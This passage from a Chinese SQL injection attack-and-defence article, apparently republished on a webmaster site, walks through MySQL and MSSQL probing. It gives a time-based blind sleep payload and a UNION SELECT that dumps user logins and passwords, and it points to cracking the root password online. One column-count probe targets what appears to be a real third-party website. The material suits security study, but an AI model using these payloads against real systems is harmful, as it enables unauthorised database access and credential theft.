网易游戏运维林伟壕：永不落幕的数据库SQL注入攻防战

然后开始试探数据库字段数、当前用户,如图14.

图14

http://192.168.115.131/cat.php?id=1 and (select * from (select(sleep(5)))lsrk)
http://192.168.115.131/cat.php?id=1%20UNION%20
SELECT%201,concat(login,%27:%27,password),4%20FROM%20users;’

接下来是用来测试是否存在基于时间的盲注和查询数据库管理员帐号密码的,拿到root账号后可以去网上破解.

msSQL

这个思路跟MySQL一样,只是需要msSQL的注释符和MySQL有所不同,前者支持–,后者支持#,如图15.

http://www.aquaservices.co.in/authorprofile.asp?id=13 order by 100–

Here comes the error : The order by position number 100 is out of range of the number of items

图15

（编辑：网站开发网_马鞍山站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!